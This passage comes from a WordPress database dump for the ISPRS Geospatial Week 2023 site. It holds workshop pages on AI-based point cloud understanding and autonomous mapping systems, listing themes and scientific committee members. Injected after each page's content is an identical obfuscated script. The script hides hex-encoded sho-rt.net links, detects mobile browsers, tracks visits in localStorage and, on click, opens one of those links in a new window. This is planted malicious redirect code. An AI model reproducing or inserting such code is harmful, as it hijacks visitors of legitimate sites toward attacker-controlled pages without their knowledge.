Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','UAV-based mapping with imaging and LiDAR systems: challenges, data processing, and applications','','inherit','closed','closed','','2574-revision-v1','','','2023-02-05 11:14:16','2023-02-05 11:14:16','',2574,'https://gsw2023.com/?p=3808',0,'revision','',0),
(3809,1,'2023-02-05 11:19:52','2023-02-05 11:19:52','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2578\" img_size=\"450x250\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\">AI-PC: AI-based Point Cloud and Image Understanding</span></strong></h5>\n<h5></h5>\n<h5></h5>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>Recent rapid and revolutionary development of AI-based techniques has brought remarkably eye-catching and competitive achievements in a wide variety of point cloud and image data interpretation tasks including landmark recognition, semantic segmentation, change detection, etc. This workshop will see contributions the topics related the state of the art and future trends addressed the following topics: new point cloud and image algorithm designs, point clouds element detection and segmentation, sensor fusion algorithms, 3D LiDAR from airborne, terrestrial, mobile and backpack autonomous systems and applications, change detection from point cloud and image data, 3D real scene, deep learning methods for point cloud and image processing, etc.</strong></h5>\n<h5><strong>The workshop will be part of the ISPRS Geospatial Week 2023 and is hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</strong></h5>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: left;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][vc_separator color=\"juicy_pink\" style=\"double\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][dt_team_carousel order=\"asc\" posts_offset=\"0\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" arrow_bg_width=\"36x\" arrow_border_width=\"0px\" r_arrow_icon_paddings=\"0px 0px 0px 0px\" r_arrow_v_offset=\"0px\" l_arrow_icon_paddings=\"0px 0px 0px 0px\" l_arrow_v_offset=\"0px\" category=\"40\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"pink\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: red;\"><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>3D LiDAR processing</strong></h6>\n</li>\n<li>\n<h6><strong>LiDAR and image fusion systems</strong></h6>\n</li>\n<li>\n<h6><strong>AI-based methods on point cloud processing technologies</strong></h6>\n</li>\n<li>\n<h6><strong>AI-based methods on image processing technologies</strong></h6>\n</li>\n<li>\n<h6><strong>Point cloud and image detection</strong></h6>\n</li>\n<li>\n<h6><strong>Visual Odometry and LiDAR 3D SLAM</strong></h6>\n</li>\n<li>\n<h6><strong>Semantic Segmentation</strong></h6>\n</li>\n<li>\n<h6><strong>Instance Segmentation</strong></h6>\n</li>\n<li>\n<h6><strong>Elements extraction from LiDAR and image data</strong></h6>\n</li>\n<li>\n<h6><strong>LiDAR altimetry</strong></h6>\n</li>\n<li>\n<h6><strong>Deep learning algorithms based on LiDAR and image</strong></h6>\n</li>\n<li>\n<h6><strong>Change detection</strong></h6>\n</li>\n<li>\n<h6><strong>Benchmark dataset using point clouds and image</strong></h6>\n</li>\n<li>\n<h6><strong>3D LiDAR from autonomous systems and applications</strong></h6>\n</li>\n<li>\n<h6><strong>UAV-based LiDAR and photogrammetry cloud points processing</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:red;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Jonathan Li, University of Waterloo, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Leila Hashemi Beni, North Carolina A&amp;T State University, USA</strong></h6>\n</li>\n<li>\n<h6><strong>Yiping Chen, Sun Yat-sen University, China</strong></h6>\n</li>\n<li>\n<h6><strong>Luis Miguel González de Santos, University of Vigo, Spain</strong></h6>\n</li>\n<li>\n<h6><strong>Haiyan Guan, Nanjing University of Information Science and Technology, China</strong></h6>\n</li>\n<li>\n<h6><strong>Samsung Lim, University of New South Wales, Australia </strong></h6>\n</li>\n<li>\n<h6><strong>Michael A. Chapman,Toronto Metropolitan University, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Yuwei Chen, Finnish Geospatial Research Institute (FGI), Finland</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"juicy_pink\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','AI-PC: AI-based Point Cloud and Image Understanding','','inherit','closed','closed','','2577-revision-v1','','','2023-02-05 11:19:52','2023-02-05 11:19:52','',2577,'https://gsw2023.com/?p=3809',0,'revision','',0),
(3810,1,'2023-02-05 11:23:24','2023-02-05 11:23:24','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2581\" img_size=\"600x250\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>IAMS - Intelligent and autonomous mapping systems</strong></span></h5>\n<h5></h5>\n<h5></h5>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>This workshop will seek contributions covering the developments of autonomous mobile sensing and mapping systems and their use in the next generation of Geospatial applications. This workshop aims to bring together communities keen on developing the next generation of drones and uncrewed platforms in general, such as robotics and computer science.</strong></h5>\n<h5 style=\"text-align: justify; color: black;\"><strong>The focus will be on the advancements in the algorithms embedded in autonomous platforms navigating in outdoor and confined/indoor spaces. Topics of interest include, but not limited to, the development of real-time drone remote sensing analytics algorithms considering edge/fog/cloud computing, innovative georeferencing techniques, deep learning algorithms for situational awareness and autonomous navigation and exploration, as well as collaborative and swarm SLAM algorithms. Lightweight, energy-efficient, replicable hardware and software solutions and their embedding in larger networks of sensors, are particularly of interest for this workshop. A specific focus will be given to BVLOS solutions and the use of autonomous platforms in urban and rural environments. The Workshops will address different monitoring and surveying applications performed by innovative autonomous platforms such as precision farming, disaster mapping, cultural heritage survey, natural environment, and infrastructure monitoring. </strong></h5>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][vc_separator color=\"turquoise\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"41\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: orange;\"><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Drones, ground and underwater autonomous systems</strong></h6>\n</li>\n<li>\n<h6><strong>Autonomous path planning, SLAM, navigation, drone-in-the-box, and VLOS/BVLOS exploration</strong></h6>\n</li>\n<li>\n<h6><strong>Edge, fog, and cloud computing for real-time scene understanding</strong></h6>\n</li>\n<li>\n<h6><strong>3D real-time mapping and semantic analysis</strong></h6>\n</li>\n<li>\n<h6><strong>Next-generation autonomous platform applications</strong></h6>\n</li>\n<li>\n<h6><strong>Innovative active and passive sensors embedded on autonomous platforms</strong></h6>\n</li>\n<li>\n<h6><strong>Collaborative and swarm platforms for Geospatial applications</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: orange;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Bashar Alsadik, University of Twente, The Netherlands</strong></h6>\n</li>\n<li>\n<h6><strong>Costas Armenakis, York University, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>John Ray Bergado, University of Twente, The Netherlands</strong></h6>\n</li>\n<li>\n<h6><strong>Filiberto Chiabrando, Politecnico di Torino, Italy</strong></h6>\n</li>\n<li>\n<h6><strong>Davide Cucci, Pix4D, Switzerland</strong></h6>\n</li>\n<li>\n<h6><strong>Martina Di Rita, Leica Geosystems, Switzerland</strong></h6>\n</li>\n<li>\n<h6><strong>Diogo Duarte, University of Coimbra, Portugal</strong></h6>\n</li>\n<li>\n<h6><strong>Markus Gerke, TU Braunschweig, Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Diego González Aguilera, University of Salamanca, Spain</strong></h6>\n</li>\n<li>\n<h6><strong>Ejia Honkavaara, NLS, Finland</strong></h6>\n</li>\n<li>\n<h6><strong>Phillipp Jende, AIT, Austria</strong></h6>\n</li>\n<li>\n<h6><strong>Andreas Kamilaris, CYENS, Cyprus</strong></h6>\n</li>\n<li>\n<h6><strong>Taejung Kim, Inha University, South Korea</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 